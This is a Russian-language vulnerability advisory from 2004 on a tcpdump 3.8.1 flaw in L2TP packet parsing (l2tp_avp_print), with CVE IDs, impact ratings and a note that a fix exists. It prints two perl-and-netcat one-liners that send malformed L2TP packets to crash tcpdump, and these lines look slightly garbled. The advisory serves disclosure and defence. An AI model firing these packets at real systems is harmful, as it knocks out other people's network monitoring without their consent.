Security Lab

Уязвимость в tcpdump в обработке L2TP пакетов

Дата публикации:21.01.2004
Всего просмотров:1399
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: CVE-2003-0989
CVE-2003-1029
CVE-2004-0055
CVE-2004-0057
Вектор эксплуатации: Удаленная
Воздействие: Отказ в обслуживании
Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: tcpdump 3.x
Уязвимые версии: Tcpdump 3.8.1 и более ранние версии

Описание: Уязвимость обнаружена в tcpdump в обработке L2TP пакетов. Удаленный пользователь может аварийно завершить работу tcpdump

Удаленный пользователь может послать специально обработанный L2TP пакет, не определяя длину параметров, чтобы заставить программу войти в бесконечный цикл или аварийно завершить ее работу. Уязвимость связанна с ошибкой в функции l2tp_avp_print():

perl -e 'print .\x80\x02...\x00.x6 | nc -u 10.1.1.1 1701
perl -e 'print .\x80\x00...\x00.x6 . .\x01.' | nc -u 10.1.1.1 1701

URL производителя: http://www.tcpdump.org

Решение:Производитель выпустил обновление, доступное через CVS.

Ссылки: Seg fault of tcpdump (v 3.8.1 and below) with malformed